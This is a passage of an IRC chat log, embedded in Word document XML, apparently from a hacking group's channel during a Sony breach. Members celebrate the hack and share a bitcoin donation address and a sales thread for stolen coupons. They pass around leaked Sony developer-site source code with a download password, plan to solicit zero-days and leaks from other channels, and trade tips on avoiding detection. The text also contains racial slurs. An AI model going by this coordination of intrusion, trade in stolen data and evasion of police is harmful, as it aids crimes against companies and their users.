          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:40:40 joepie91 lol Jun 02 16:40:43 joepie91 I just have a good client :) Jun 02 16:41:11 * joepie91 lols at aaron barr tweet Jun 02 16:41:24 trollpoll Neuron, im jt-rasset XD Jun 02 16:41:50 joepie91 Recursion Jun 02 16:41:54 joepie91 dairc Jun 02 16:41:57 joepie91 #frantech Jun 02 16:42:00 joepie91 the buyvm/frantech channel Jun 02 16:42:05 joepie91 irc.dairc.net Jun 02 16:42:34 neuron talking to a member in there Jun 02 16:42:46 neuron who claims to ahve secdev.net's source code hes donating under the condition it never goes public Jun 02 16:42:59 &lt;recursion_&gt; tell him an IRC op from partyvan says hello Jun 02 16:43:00 &lt;recursion_&gt; :P Jun 02 16:44:02 sabu hahhahhahahahah Jun 02 16:44:08 sabu aaron barr tweeted Jun 02 16:44:09 sabu oh man Jun 02 16:44:12 joepie91 btw, http://anonbooks.strangled.net/File%20Mirrors/ Jun 02 16:44:17 joepie91 got the .tar.bz2 there Jun 02 16:44:20 joepie91 it's not going anywhere Jun 02 16:44:21 joepie91 :) Jun 02 16:44:29 joepie91 so feel free to link if needed Jun 02 16:44:32 Topiary 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 16:44:35 Topiary that's our new one by the way Jun 02 16:44:42 Topiary I accidentally hit F5 and it generated a new one Jun 02 16:44:57 lol yeh he's the guy who was testing the coupons when i said we could get them sold he was going to sell them for us and i gave him some to test Jun 02 16:44:57 lol i even mentioned it here :D Jun 02 16:45:11 neuron ahh ok Jun 02 16:45:51 joepie91 Topiary: you using a web wallet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:46:06 joepie91 lol: ah, might be better to not have him talking about it in public though, lol Jun 02 16:46:12 joepie91 *especially* not in #Frantech Jun 02 16:46:24 Topiary yeah web wallet Jun 02 16:46:33 lol yeh :D Jun 02 16:46:46 joepie91 http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1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16:46:51 &lt;recursion_&gt; jesus, is that kid still in the hospital? Jun 02 16:46:56 joepie91 this was just posted in #Frantech Jun 02 16:46:57 lol but it's technically on his own back because he knows no one in this channel :P Jun 02 16:46:58 lol he got them from me Jun 02 16:47:06 &lt;recursion_&gt; I think he managed to put IRSSI on his heart monitor or something Jun 02 16:47:06 joepie91 &lt;vld&gt;http://webcache.googleusercontent.com/search?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&amp;hl=en&amp;strip=1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16:47:07 joepie91 &lt;vld&gt;ewww Jun 02 16:47:13 joepie91 it's a sales thread for the coupons...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:47:23 joepie91 Recursion_: who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:47:54 &lt;recursion_&gt; Kardus Jun 02 16:47:54 &lt;recursion_&gt; lol Jun 02 16:48:20 neuron Sabu: im getting the http://secdev.net code Jun 02 16:48:40 joepie91 idk who he is Jun 02 16:48:40 joepie91 lol Jun 02 16:48:49 &lt;recursion_&gt; I used to have DOX on him Jun 02 16:48:51 neuron ill verify Jun 02 16:48:52 * Recursion_ shrugs Jun 02 16:49:00 sabu ok Jun 02 16:49:05 sabu guys Jun 02 16:49:07 sabu neruon etc Jun 02 16:49:10 &lt;recursion_&gt; whaddap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:49:13 trollpoll &lt;anonymous&gt; But yeah, my good friend broke into [REDACTED] Jun 02 16:49:14 sabu I don't have to say this more than one I hope Jun 02 16:49:30 sabu but people on 2600 are not your friends 95% are there to social engineer you Jun 02 16:49:35 sabu to analyze how you talk Jun 02 16:49:36 neuron aye i realize this Jun 02 16:49:39 sabu and make connections Jun 02 16:49:44 sabu I am just reminding you Jun 02 16:49:55 &lt;recursion_&gt; this is the reason why I either dont talk, or I talk completely differently.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:49:56 sabu don't go off and befriend any of them Jun 02 16:49:57 neuron http://reflets.info/sony-takedown-nouvelle-fuite-de- donnees-un-million-de-comptes-utilisateurs-dans-la-nature/ &lt;&lt; first news post Jun 02 16:50:01 sabu if they message you with info Jun 02 16:50:09 trollpoll yes, pretty sure, thats why i dont talk so much, because of my poor english xDDD Jun 02 16:50:11 sabu save it and pastee.org Jun 02 16:50:18 sabu if they give you code or rars or weird urls Jun 02 16:50:31 sabu grab from vps server no dcc nothing thats risky Jun 02 16:50:34 sabu be smart about shit Jun 02 16:50:41 sabu if any of you get owned I'll lol Jun 02 16:51:45 neuron hehe Jun 02 16:51:57 neuron i don't talk to them the same way i talk here thats for sure :P Jun 02 16:52:29 lol i allways talk in broken english to them because i am "from pakistan" Jun 02 16:52:39 joepie91 lol Jun 02 16:52:55 lol you mean i not do good engliush i am learn from book Jun 02 16:53:08 trollpoll i talk like that because i cant speak better xDDDDDDD Jun 02 16:54:13 sabu ok who is in there now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:19 sabu kayla you in there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:36 joepie91 in where?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:38 sabu let niggers know to msg you 0day / research / leaks Jun 02 16:54:40 sabu in 2600 chan Jun 02 16:54:42 joepie91 a Jun 02 16:54:43 joepie91 ah* Jun 02 16:54:50 sabu you heard kayla?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:55:12 trollpoll i've kicked myself XD Jun 02 16:55:18 trollpoll so im not there anymore Jun 02 16:55:21 lol another protip even if you are american dont spell it "color" use "colour" which is wider used arround the world just saying "color" means you are american Jun 02 16:55:25 lol sbau heard what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:56:15 sabu if you're on 2600 /topic to msg you with 0days or leaks. niggas coming there and giving up lleaks Jun 02 16:56:21 sabu make sure we take advantage of that Jun 02 16:56:25 sabu see what n1ggers got access to Jun 02 16:56:27 sabu that we can use Jun 02 16:57:29 neuron there you go Jun 02 16:58:39 neuron joepie91: i can op you but....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:58:46 joepie91 better not Jun 02 16:58:47 joepie91 I think Jun 02 16:58:53 * lol has quit (A TLS packet with unexpected length was received.) Jun 02 16:58:55 joepie91 actually Jun 02 16:58:59 joepie91 let me hop on from a VPS Jun 02 16:59:01 joepie91 or someshit Jun 02 16:59:05 joepie91 mm Jun 02 16:59:12 joepie91 I don't have an unused vps that is not linkable to me Jun 02 16:59:13 joepie91 &gt;.&gt; Jun 02 16:59:16 sabu how many people are inside the chan?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:59:19 sabu did it grow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:59:27 * lol (parr0t@HA-g80.qfc.p26q8u.IP) has joined #pure-elite Jun 02 16:59:31 joepie91 or actually I do Jun 02 16:59:31 joepie91 maybe Jun 02 17:00:07 joepie91 goddamn Jun 02 17:00:10 joepie91 FUCK YOU W2SERVERS Jun 02 17:00:14 * joepie91 raeg Jun 02 17:00:27 joepie91 changeme:~# uptime Jun 02 17:00:27 joepie91 01:00:23 up 2:10, 1 user, load average: 0.10, 0.03, 0.01 Jun 02 17:00:29 joepie91 come the fuck on Jun 02 17:00:29 trollpoll im there again, im "virtual" Jun 02 17:00:32 trollpoll but, dont op me Jun 02 17:00:36 joepie91 that's the 3rd unannounced reboot Jun 02 17:00:37 joepie91 in 2 weeks Jun 02 17:01:04 * joepie91 is going to move his irc hub elsewhere Jun 02 17:01:22 &lt;recursion_&gt; joepie91: I would. Thats bullshit. Jun 02 17:01:31 joepie91 I've had 4 full days of downtime Jun 02 17:01:33 joepie91 in the past month Jun 02 17:01:39 joepie91 the server is massively laggy Jun 02 17:01:44 joepie91 because it's on a heavily overloaded node Jun 02 17:01:56 joepie91 and it sometimes is so bad Jun 02 17:01:58 joepie91 that I have to wait 10 seconds Jun 02 17:02:01 joepie91 for a response from nickserv Jun 02 17:02:12 joepie91 even for a $24/yr server that is just BAD Jun 02 17:03:27 joepie91 &lt;prosi&gt;#Sony has passed the point where it's better to simply scorch the earth and create a new system from scratch. Jun 02 17:03:28 joepie91 lol Jun 02 17:05:34 * joepie91 should get a Cinfu Jun 02 17:05:50 neuron joepie91: i got a 3 month for $8 so good Jun 02 17:06:09 joepie91 how good is it? as in responsive?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:06:16 neuron its in germany so a bit of lag Jun 02 17:06:20 neuron but its on a 100mbs line Jun 02 17:06:25 joepie91 I'm in europe lol Jun 02 17:06:29 neuron so i ping google from it.. 17.2ms Jun 02 17:06:30 neuron :P Jun 02 17:06:31 neuron so good Jun 02 17:06:35 joepie91 netherlands, more exactly Jun 02 17:06:35 joepie91 mm Jun 02 17:06:36 joepie91 nice Jun 02 17:06:37 joepie91 but Jun 02 17:06:42 joepie91 gimme working 2600 ip Jun 02 17:07:09 joepie91 nvm Jun 02 17:07:16 joepie91 command prompt decided to start working Jun 02 17:07:17 joepie91 sort of Jun 02 17:07:57 &lt;recursion_&gt; upboat, please: http://www.reddit.com/r/technology/comments/hq823/sony_hacked_again_millions_of_usernames_passwords/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02 17:08:01 &lt;recursion_&gt; if you have an account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:08:34 joepie91 YouAreAPirate = me Jun 02 17:10:03 joepie91 someone +o me? :D Jun 02 17:10:06 joepie91 I mean Jun 02 17:10:09 joepie91 YouAreAPirate Jun 02 17:10:11 joepie91 not joepie91 Jun 02 17:12:13 &lt;recursion_&gt; johnmanthorpe John Manthorpe Jun 02 17:12:13 &lt;recursion_&gt; 50/50 about unvalidated reports that Lulz S has hacked into #Sony Nice trick to gain notoriety.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:12:22 &lt;recursion_&gt; wtf does that mean?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:13:25 neuron Im captianJack btw Jun 02 17:13:25 joepie91 Neuron, Topiary, Sabu, anyone else who might have +o in #lulzsec Jun 02 17:13:31 neuron joepie91: did it Jun 02 17:13:33 joepie91 can has +o on YouAreAPirate Jun 02 17:13:34 joepie91 ag Jun 02 17:13:35 joepie91 ah* Jun 02 17:13:43 joepie91 thankies Jun 02 17:14:11 &lt;recursion_&gt; Mitnick commented on the twitters Jun 02 17:14:18 &lt;recursion_&gt; lawllawlllawllawllawl Jun 02 17:14:23 &lt;recursion_&gt; WUR FAMOUZ Jun 02 17:14:55 neuron i just looked at this guys source for "sonydev.net" Jun 02 17:14:57 trollpoll 144 users and growing Jun 02 17:14:59 neuron it seems ligit.. php file etc Jun 02 17:15:07 neuron still investigating in my vm Jun 02 17:15:11 &lt;recursion_&gt; also the realtime updates on Google are flowing constantly Jun 02 17:15:16 &lt;recursion_&gt; moreso than the 2pac update Jun 02 17:15:24 trollpoll everyone in sec world is commenting right now about lulzsec...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:44 &lt;recursion_&gt; yup Jun 02 17:15:44 neuron we are 9k in \o/ Jun 02 17:15:49 sabu if people give you pasteable data pastee.org with encryption and password and link here Jun 02 17:15:52 &lt;recursion_&gt; bitcoin?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:56 &lt;recursion_&gt; Neuron: in what?!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:59 sabu if someone links you to urls/codes/etc llink here Jun 02 17:16:11 sabu neuron that source you got pastee.org so we can analyze also Jun 02 17:16:19 joepie91 Neuron: 9k wat?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:16:40 kl0ps congratulations!!! that is so funny :D Jun 02 17:16:59 kl0ps u all 13375 :) Jun 02 17:17:01 neuron url: http://www.multiupload.com/726251QMUK Jun 02 17:17:11 neuron pass: 93ght98hq308h5QA$ %Q#$ A#%UYA%YQ Jun 02 17:17:18 neuron kl0ps: your elite also because your part of us :) Jun 02 17:17:23 neuron joepie91: 9k followers on twitter Jun 02 17:17:33 kl0ps thank :) Jun 02 17:17:33 joepie91 IT'S OVER 9000 Jun 02 17:17:36 joepie91 !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:17:45 kl0ps +s Jun 02 17:17:54 neuron supplier = sonic-iso of 2600 Jun 02 17:17:54 sabu 55mb neuron?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:17:56 sabu downloading Jun 02 17:18:06 sabu which site is this for?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:18:08 sabu sonydev.net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:18:27 neuron aye Jun 02 17:18:44 neuron its a svn pull Jun 02 17:18:50 neuron so technicly you can svn update it Jun 02 17:19:02 neuron im sure we can find the pass somewhere on sony Jun 02 17:19:12 trollpoll 15... r we all here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:20:45 * Sabu gives channel operator status to [redacted] Recursion_ trollpoll lol Jun 02 17:21:11 &lt;recursion_&gt; Sabu: kill Recursion Jun 02 17:21:17 &lt;recursion_&gt; not this account, the other one Jun 02 17:21:19 &lt;recursion_&gt; obviously/.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:21:27 &lt;recursion_&gt; its screen session is hanging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:22:10 * Recursion has quit (Killed (Sabu (le sigh))) Jun 02 17:22:39 neuron omg there actually doing it XD Jun 02 17:22:41 neuron this is fucking epic Jun 02 17:22:50 &lt;recursion_&gt; &lt;3 Jun 02 17:22:52 sabu doing what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:23:05 * Recursion_ is now known as Recursion Jun 02 17:23:05 pwnsauce are we getting bit coins?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:23:45 Topiary 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 17:23:47 Topiary not got any here so far Jun 02 17:23:52 neuron singing You are a pirate Jun 02 17:24:18 joepie91 Topiary Jun 02 17:24:19 joepie91 http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 17:25:17 sabu analyzing scedev source codes now Jun 02 17:25:27 joepie91 my god Jun 02 17:25:29 joepie91 this VPS is laggy Jun 02 17:25:29 joepie91 lol Jun 02 17:25:37 neuron rgr Jun 02 17:25:45 neuron joepie91: the german one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:26:36 joepie91 noes Jun 02 17:26:37 joepie91 w2servers Jun 02 17:26:40 joepie91 the czech one Jun 02 17:27:00 neuron ha Jun 02 17:27:00 Recursion seriously guys Jun 02 17:27:05 neuron get the german one trust me Jun 02 17:27:07 Recursion watch the live feed on google.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:27:30 Recursion its moving with a great speed for this only being public for abo0ut an hour Jun 02 17:28:13 neuron Recursion: im on the irc talking to people Jun 02 17:28:21 Recursion on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:29:24 Recursion Neuron Jun 02 17:30:04 neuron yup Jun 02 17:30:17 neuron Now talking to guy who claims he has a simple way to break into mantech.com Jun 02 17:31:08 trollpoll ok, now that we are so much ppl here, dont you think we need a kind of protocol in case of been caught, something like tell someone (friend, familiy) to enter here an say just a phrase to make the rest know he were caught...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:31:37 Recursion trollpoll: provided everyone keeps shit to themselves Jun 02 17:31:42 Recursion then nothing will happen Jun 02 17:31:52 neuron just incase if i come in here saying Jun 02 17:32:01 neuron "FUCK FUCK SHIT GUYS FUCK! DELETE YOUR SHIT FUCK!" Jun 02 17:32:03 neuron you know :) Jun 02 17:32:06 trollpoll ahahahaha Jun 02 17:32:07 Recursion ditto Jun 02 17:32:08 Recursion lol Jun 02 17:32:23 joepie91 lolol Jun 02 17:32:25 trollpoll if you were caught you wont be able to enter here xDDDDDDDD Jun 02 17:32:38 trollpoll i know, im always in paranoic mode...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:32:58 lol thts how we will know you are caught :D Jun 02 17:33:00 lol when you dont come here :D Jun 02 17:33:12 joepie91 good method to insure yourself Jun 02 17:33:15 trollpoll hahaha Jun 02 17:33:19 joepie91 give one person an archive Jun 02 17:33:21 joepie91 with instructions Jun 02 17:33:27 joepie91 on how to get on here and alert people Jun 02 17:33:31 joepie91 give another person you trust the key Jun 02 17:33:33 Recursion ROFL Jun 02 17:33:34 Recursion .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:33:34 Recursion peruvianidol. RT @GerryDuggan: Sony getting hacked again is like Biggie Smalls' hearse getting shot up.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:33:36 joepie91 make them contact each other somehow Jun 02 17:33:39 joepie91 when you are in trouble Jun 02 17:33:41 trollpoll xDDDDDDD Jun 02 17:35:23 neuron who is bottle_of_rum Jun 02 17:37:34 joepie91 who is voodoo Jun 02 17:37:48 neuron Sabu: whats the word on that source?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:42:19 storm hey Jun 02 17:42:26 storm i just read the twitter Jun 02 17:42:31 storm good lookin' Jun 02 17:42:38 sabu sups Jun 02 17:42:44 storm Sabu Jun 02 17:42:54 storm you douchenozzle. I txted you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:08 storm how did I know it was you: cause no one does a fake ass haddem laugh better than you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:30 sabu EhehahEHUUEAhhahhauehuUHEHAHHeuaheuhUHAeaheaueAHAUHEAE Jun 02 17:43:31 storm &lt;3 :&gt; Jun 02 17:43:33 storm rofl Jun 02 17:43:57 Topiary seriously how the fuck...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:58 storm HauHauHAUHAUHauHauHAUHAUHauHauHAUHAUHauHauHAUHAU Jun 02 17:44:02 Topiary HEuheuheuhUHAhahhaaheuheuhahHAHAHAHEHE Jun 02 17:44:11 sabu storm Jun 02 17:44:15 storm yo Jun 02 17:44:16 sabu my brazil character Jun 02 17:44:18 pwnsauce hey Jun 02 17:44:20 sabu is based off haddem Jun 02 17:44:21 sabu haahhaha Jun 02 17:44:22 storm rofl Jun 02 17:44:31 storm u drop then we talk ok?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:44:37 sabu ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:44:43 storm that's what haddem says Jun 02 17:44:51 sabu yeah Jun 02 17:44:51 storm I DDOS U U COME BACK THEN WE TALK OK?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:17 storm btw--#lulzsec is hilarious Jun 02 17:45:24 sabu really? whats going on in there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:31 storm it couldn't have worked out any more perfectly Jun 02 17:45:36 storm just us being on the servers we ddos Jun 02 17:45:40 storm and them not saying shit Jun 02 17:45:43 neuron yeah haha Jun 02 17:45:46 sabu topiary/neuron - should we just leak the source code for scedev.net / Jun 02 17:45:50 lol Sabu: come over :D Jun 02 17:45:51 sabu what did neuron say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
